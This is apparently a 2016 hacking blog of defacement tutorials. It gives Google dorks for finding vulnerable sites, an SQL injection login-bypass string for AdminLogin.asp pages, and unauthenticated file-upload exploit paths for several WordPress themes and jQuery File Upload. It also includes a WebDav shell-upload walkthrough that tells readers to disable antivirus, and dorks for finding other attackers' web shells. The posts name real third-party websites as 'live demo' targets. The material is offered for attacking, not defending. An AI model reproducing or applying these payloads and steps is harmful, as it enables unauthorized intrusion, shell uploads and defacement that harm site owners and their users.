Home Of 3xploit

Thursday, October 6, 2016

AdminLogin.asp Exploit

Hi dudez, how is your dayz ??
Now let fire on

Go to Google.com Enter this Dork: inurl:"/AdminLogin.asp"

Select any web

Username: 1'or'1 '=' 1

Password: 1'or'1 '=' 1

Click Login

Upload your shell using Tamper data..

if vul it'll login you in, but if it is not vul, move to another web...

Live Demo:

http://www.quickwrench.com/Admin/adminlogin.asp

http://www.ringjordan.com/AdminLogin.asp

http://www.sunmarytrust.org/adminlogin.asp

http://www.adyar.net/Adminlogin.asp

http://polyprodw.trafficpullz.info/adminlogin.asp

http://www.preventivecardiology.in/adminlogin.asp

Stay_Tune_Aways

Exploit WP-STORE | Upload Vulnerability

Exploit WP-STORE | Upload
Vulnerability

dork: inurl:/wp-content/themes /WPstore/

1. WPStore

2. eShop

3. KidzStore

4. Emporium

5. Store

6. eCommerce

7. framework

8. frameworkold Theme can be changed [change on the
back that you know]

first of all Googling by using one of the dork

If select any web, then add the /upload/ after
the path theme

example: http://site.com/wp-content/themes/framework/
upload/

Types of files extention to upload are php, txt, html, etc.

To access your uploaded file

http://site.com/wp-content/uploads/products_img/yourfile.php

Live Target: http://www.lacasadelcromo.es

Thats All for....

Thursday, September 22, 2016

Jquery deface tutorial...

This time I Want to Share the Tutorial
deface With Jquery File Upload
Vulnerability Exploits....

Dork:

Inurl:/assets/global/plugins/jquery-file-upload/

Inurl:/jquery-file-upload/server/php/
intext:{"files":[]}

Inurl:/assets/global/plugins/jquery-
file-upload/ intext:index of

Exploits :

http://www.target.com/assets/global/plugins/jquery-file-upload/server/
php/

If Vuln It would look like this

CRSf :

Save the code below to the .html
format, Do not
Forget http://www.target.com replace it with your targets...

Access your shell at
http://
www.target.com/assets/global/plugins/
jquery-fileupload/server/php/files/
shell.php

Happy hacking geeez....

Wednesday, September 14, 2016

Tutorial deface Using WebDav

how to hack using Webdav

webdav hacking tutorial is one of the simplest method of hacking, it somehow easy to understant, lemme cut the story short, kindly follow my precedure patiently

first ofAll download webdav software

HERE

To search for vulnerable web use this webdav
following dorkz below:

inurl: Hmei7.asp; .txt

inurl: Umer.asp; .txt

intitle: "index.of" intext: "(Win32)

intitle: "index.of" intext: "(Win32)
DAV / 2?

inurl: webdav

inurl: .com.ng / *. asp

inurl: .com / *. asp

inurl: .net / *. asp

copy one dork above. Now go
to www.google.com and paste dork into the search box as shown
below.

Now open webdav tool. Do not forget to
turn off antivirus before opening
webdav. This is a view webdav. How cool
is that, there is a picture of Patrick lol.

Firstly click WebDav on the menu bar, then click Asp shell maker

Wait until a new window appears as below, then click the Settings menu.

Later appeared the form to set the file name and the script as below, click Load from file Shell..

Now locate the script deface agan already prepared. The file may be in the form of .html or .txt file, then click open.

See i've changed the script. Now edit the file name on the menu Name of your shell. Here I love the example name isc.html and if already changed, press the button Hide me.

Well weapons already ready to be used now enter the target. Xixixi, already rich want to combat wrote: The target is filled according to search results on google dork earlier. I click the
button Add Site.

Enter the url of the target and then click OK.

Now click Attack !!!

Click OK.

Later, if successful, it will be written as shown below.

Copy the url above http://www.e-ctasia.com/isc.html then paste in the address bar and hit enter...

If not succeed, try again and look for another target. You're done, Hopefully the tutorial is easy to understand :)

SHELL DORKING TUTORIAL

Okay this time I want to share a
powerful dorkz, for free shellz on google.
Perhaps it is useful for who are curious
to deface..

Dorking shell b374k M1N1

just visit google and type this dork

intitle: b374k M1N1 inurl: wp-content

you'll get something like

Dorking Shell Madspot

Dork: intitle: Madspot Security

you'll see something like

Dorking 1n73ct10n Shell

Dork: intitle: 1n73ct10n inurl: wp-content

you'll get something like

i hope itz cool right ?? You can try any shell that google indexed..

Wordpress Templatic Themes CSRF File Upload Vulnerability

#Title : Wordpress Templatic Themes
CSRF File Upload Vulnerability
[Monetize Uploader]

#Author : mdhaxor

#Category : Web Applications

#Type : PHP

#Vendor : http://templatic.com/

#Download : http://templatic.com/
wordpress-themes-store/

#Tested : Mozila, Chrome, Opera ->
Windows & Linux

#Vulnerabillity : CSRF

#DORK :

inurl:/wp-content/themes/Realestate/

inurl:/wp-content/themes/dailydeal/

inurl:/wp-content/themes/nightlife/

inurl:/wp-content/themes/5star/

inurl:/wp-content/themes/specialist/

CSRF File Upload Vulnerability

Exploit & POC : http://site-target/wp-
content/themes/Realestate/Monetize/
general/upload-file.php

File Access :

http://site-target/wp-content/themes/
Realestate/images/tmp/your_shell.php

Note : make sure the
Script CSRF equate with dork you use

Thatz All....

Friday, September 2, 2016

WORDPRESS PURVISION EXPLOIT

#Title : Wordpress PureVision Theme Arbitrary File Upload

#Author : mdhaxor

#Vendor : http://themeforest.net

#Download : http://themeforest.net/item/purevision-wordpress-
theme/156538

#Tested : Mozila, Chrome-> Windows

#Vulnerabillity : Arbitrary File Upload

Dork : inurl:wp-content/themes/ purevision

Vuln: /wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php

if vuln it'll show a blank page

CSRF

then upload your file..

Get File Access on www.site.com/yourfilename.php

E.G www.benbusinesstransfers.com/xxd.txt

#thats_all...